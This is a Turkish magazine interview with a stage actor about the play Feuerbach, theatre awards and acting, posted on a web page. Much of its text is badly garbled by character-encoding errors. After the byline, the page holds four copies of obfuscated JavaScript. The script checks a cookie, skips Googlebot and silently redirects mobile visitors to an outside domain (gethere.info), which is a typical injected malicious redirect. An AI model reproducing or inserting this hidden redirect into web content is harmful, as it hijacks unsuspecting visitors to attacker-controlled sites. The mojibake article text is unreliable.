Var. TanAi??dAi??AYAi??m bir kaAi?? oyuncu var Ai??yle. Onlar benim en sevdiAYim adamlardAi??r ama. Feuerbach YAi??ldAi??rAi??m Ai??nalai??i??dAi??r. Ai??A?nkA? onlar, o altAi??n anlarAi?? yakalayabilecek kudrette ve korkusuzluktadAi??rlar. Ai??A?nkA? onlar vurgun yemeyi gAi??ze almAi??AY oyunculardAi??r. AslAi??nda oyunun oyunu olmaz. Onu gerAi??ekten yaAYantAi??layabilmek iAi??in hA?cre Ai??ldA?rmeyi gAi??ze almanAi??z gerekir. Bu adamlar bunu yaparlar. Yeter ki o an var olabilsinler. Ve ben bu adamlara Ai??ok saygAi?? duyarAi??m. Bu adamlar beni aAYlatAi??rlar. KontrollA? AYizofreniyi Ai??ok zevkle yaAYarlar. Azu sAi??radan dA?nyada yoAYun insan sevgileriyle dAi??AYardan kA?kreselerde, iAi??erdeki o Ai??ocukluklarAi??yla Ai??ok etkileyicidirler. Zaten tiyatro sanatAi??nAi?? da onlar yapar.

Feuerbachai??i??Ai??n gAi??zA? Ai??ok kara. OyunculuAYa tutkun ve tiyatroyu kutsanma olarak algAi??lAi??yor. Tiyatro aAYkAi??nAi??n Ai??lAi??A?sA? olur mu? Bir oyuncu tiyatro iAi??in ne kadar ileri gidebilir? Yazar Tankred Dorstai??i??a baktAi??AYAi??mAi??zda 2. DA?nya SavaAYAi??ai??i??nAi??nda, Hitler tarafAi??ndan, ai???son umut askerleriai??? olarak 19 yaAYAi??nda askere Ai??aAYAi??rAi??lAi??yor. Ve SavaAY sonrasAi??nda Amerika ve Ai??ngiltereai??i??de savaAY esiri oluyor. Feuerbach kiAYiliAYi A?zerinde savaAYAi??n etkilerini gAi??rmemiz bundan…
Ai??ok isterdim yazarAi??n oyunu izlemesini. Bence en beAYendiAYi oyunu olurdu. Bence bu oyun,Ai?? onun istediAYi biAi??imde oynanAi??yor. Oyunumuzdaki merdiven sahnesinde, izleyicilerin, bu adam dA?AYecek mi diye endiAYe ettiklerini bilirim. Bu korkuyu yaAYamalarAi?? o kadar Ai??nemli ki… Ama ben de ai???mAi??AYai??? gibi atlamAi??yorum oradan. GerAi??ekten atlAi??yorum ve dA?AYme ve dA?AYmeme anAi??nAi?? sAi??nAi??yorum. O anAi?? yaAYAi??yorum yani. YAi??netmenin en bA?yA?k korkusuydu, ai???GittikAi??e Feuerbachai??i??laAYAi??yorsunai??? diyordu. Ai??yle deAYil aslAi??nda, yani o sAi??nAi??rAi?? ben elimde tutuyorum. O delirme noktasAi??na gidebilmek… SAi??namak… Teknik ekipten biri: ai???Bu adam deliyi oynuyor ama adam zaten deli.ai??? demiAY. Bu eleAYtiri Ai??ok hoAYuma gider.

Ai??ai???Feuerbach gibi bir oyun oynanAi??yor ve bir Allahai??i??Ai??n kulu da hakkAi??nda tek kelime etmiyor, gAi??rmA?yor, deAYerlendirmiyor, yok sayAi??yorai??i?? Bazen Ai??yle noktaya geliyorum ki bAi??ylesi Ai??nemli bir oyunu -gerAi??ekten ben oynadAi??AYAi??m iAi??in sAi??ylemiyorum- gAi??rmezden geldikleri iAi??in; sanat seAi??icilerinden, jA?ri A?yelerinden falan nefret ediyorumai??? diyorsunuz. Ama Karadeniz Teknik A?niversitesi En Ai??yi Tiyatro Oyuncusu Ai??dA?lA?ai??i??nA? bu oyunla alAi??yorsunuz.
Bu oyun Ai??ok Ai??nemli. GA?nA?mA?zde altAi??n deAYerinde, Ai??A?nkA? oyuncuyu, sistemi anlatAi??yor. Oyuncu olup da oyunuma gelip aAYlamadan Ai??Ai??kanAi?? Ai??ok az gAi??rdA?m. Bir de en gA?zel cevabAi?? bana Ankara Hukuk FakA?ltesi verdi. Normalde Ai??dA?lA?, Ankaraai??i??da oynanan oyunlara verirken; ai???Feuerbachai???a verdiler. Tabii ki Trabzonai??i??dan A?niversiteden aldAi??AYAi??m Ai??dA?lle de Ai??ok onur duydum ama Ai??ok AYaAYAi??rtAi??cAi?? deAYil. Ama tiyatronun baAYkenti olan Ankaraai??i??nAi??n ilk defa Trabzon Devlet Tiyatrosuai??i??na Ai??dA?l vermesi Ai??ok deAYerli. Benim sAi??ylemek istediAYim de oydu. Siz gAi??rmA?yorsunuz bAi??lge tiyatrosu diye ama varAi??z!

ai???Karar Kiminai???de boyundan aAYaAYAi?? felAi??liyi oynadAi??AYAi??nAi??z oyun aslAi??nda Ai??ok Ai??vgA?yle anAi??lmAi??AY.

O da Ai??ok enteresan bir oyundu. Boyundan altAi?? tutmayan bir heykeltAi??raAYAi??n Ai??ykA?sA?ydA?. Zaten hep Ai??ok uzun oyunlarAi??n oyuncusu oldum. O oyun da Ai??rneAYin fark edilmedi, gAi??rA?lmedi. Ai??ok Ai??zel bir Ai??alAi??AYmaydAi??. Ai??tenazi isteyen bir hastanAi??n hikA?yesiydi ama kim vurduya gitti. Mesela Ai??stanbul sanatAi??Ai??sAi?? olsam, hemen Ai??dA?l verirlerdi. Benim artAi??k Ai??dA?lle hiAi?? iAYim yok. TA?rkiyeai??i??deki bu Ai??dA?l sistemi hiAi??bir mA?nA? teAYkil etmiyor.

ai???6 sene Ai??stanbulai??i??da kaldAi??ktan sonra Trabzonai??i??a dAi??ndA?m. Oradaki oyunumda kendimle yA?zleAYtim. Hemen sonrasAi??nda da teklif geldi (Yalan DA?nya)ai??? diyorsunuz. YA?zleAYmeden nasAi??l Ai??Ai??ktAi??nAi??z?

Oyunculuk aslAi??nda bir tasavvuf iAYi. AslAi??nda hayat da Ai??yle. Tiyatroda, sanatta kendini sevmenin bir anlamAi?? yok. Tiyatroda seyirciyi sevmek baAYka bir AYey yaratAi??yor. YA?zleAYmem o oldu. Ai??nsan kendini Ai??ok beAYenmemeli, kendine hayran olmamalAi??. Bunu bilgi olarak bilseniz bile, unutuyorsunuz bazen. Ama ai???Feuerbachai???da o kadar kuvvetli bir manifesto var ki bana hep asla kendini o kadar Ai??nemseme, o kadar sevmeyi anlattAi??. Ama amaAi??larAi?? sev, amacAi??n yolunu sev… Feuerbach sA?rekli kapAi?? gibi Ai??nA?mde duruyor. Ai??rneAYin elimde bir Feuerbach parmaAYAi??m var artAi??k benim. Oyunda parmaAYAi??m kAi??rAi??ldAi?? ve artAi??k bu parmaAYAi??mAi??n adAi?? ai???Feuerbach parmaAYAi??ai???. Yani bende, hayatAi??mda iz bAi??raktAi??. Ben bu faAi??alarAi?? Ai??ok severim.

DT dAi??AYAi??nda DOTai??i??ta da A?Ai?? oyunda (ai???Pornografiai???, ai???BAi??cekai???, ai???Vur/YaAYmala/Yenidenai???) oynadAi??nAi??z. Ai??lAi??ekleri farklAi??, seyircisi farklAi??, amaAi??larAi?? farklAi??, Ai??zgA?rlA?kleri farklAi??…

Devlet Tiyatrosuai??i??nda Ai??rneAYin, sesimi en arka sAi??raya ulaAYtAi??rmalAi??yAi??m durumu var ya, bir sA?re sonra ona alAi??AYAi??lAi??yor. DOTai??i??ta oyunculuAYunuzu kA?Ai??A?ltA?yorsunuz. DOTai??i??ta oynarken Trabzon Devlet Tiyatrosuai??i??ndan arkadaAYAi??m MiraAi?? Eronat geldi, oyunu izledi ve seni tanAi??yamadAi??m, dedi. O alanAi?? kA?Ai??A?ltA?nce, insanAi??n kendi iAi?? yetenekleriyle oynamasAi?? da deAYiAYiyor. Yani oyuncularAi??n zaman zaman alan deAYiAYtirmeleri aslAi??nda iyi bir AYey. O yA?zden DOT bana Ai??ok iyi geldi. Ondan sonra ai???Feuerbachai???a baAYlamam benim iAi??in Ai??ok avantajlAi?? oldu. Ai??A?nkA? oradaki edinimlerimi zaman zaman Feuerbachai??i??da kullandAi??m. Salon kA?Ai??A?ldA?kAi??e oyunun gA?cA? artAi??yor. Devlet Tiyatrosuai??i??nda AYAi??yle bir anlayAi??AY oluyor: Seyirciler buraya oyunu izlemeye geldi. Biz de oyunu oynayalAi??m ama iyi oynayalAi??m. Sistem gA?zel Ai??alAi??AYsAi??n. Bu deAYil ama; seyirciyi tavlamak lazAi??m. KA?Ai??A?kken ben bir yemin etmiAYtim: ai???Ben oyun oynamayAi?? hiAi?? bAi??rakmayacaAYAi??m.ai??? demiAYtim. Bence AYunu bilmekte Ai??ok fayda var. Ai??nsan oyun oynamayAi?? bAi??rakmamalAi??. BA?yA?menin avantajAi?? o olmalAi??: MAi??zAi??kAi??Ai?? olmamalAi??, dA?rA?st oynamalAi?? Ai??A?nkA? bize kalan tek AYey oyun. Ben insanlarAi?? da oyuna dahil etmek isterim. Ai??A?nkA? herkes oyun arkadaAYAi?? arar kendine. Bu yaAYamAi??n ta kendisi. Seyirci de Ai??ocukluktan geldiAYi iAi??in oyuna Ai??aAYrAi??yAi?? alAi??r, bilir. Azimdi A?nlA? oldun, tiyatroyu bAi??rakAi??rsAi??n diyorlar. AsAi??l AYimdi bAi??rakmam ben tiyatroyu.

Yemininizi unutmayAi??n, oyun oynamayAi??, tiyatroyu hiAi?? bAi??rakmayAi??n.

PAi??nar Erol

(Tiyatro… Tiyatro… Dergisi. SayAi??: 250, Haziran 2013)var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Benzer Yazılar

Bu web sitesi size daha iyi bir performans sunmak için cookie kullanmaktadır. kabul edin Devamını Oku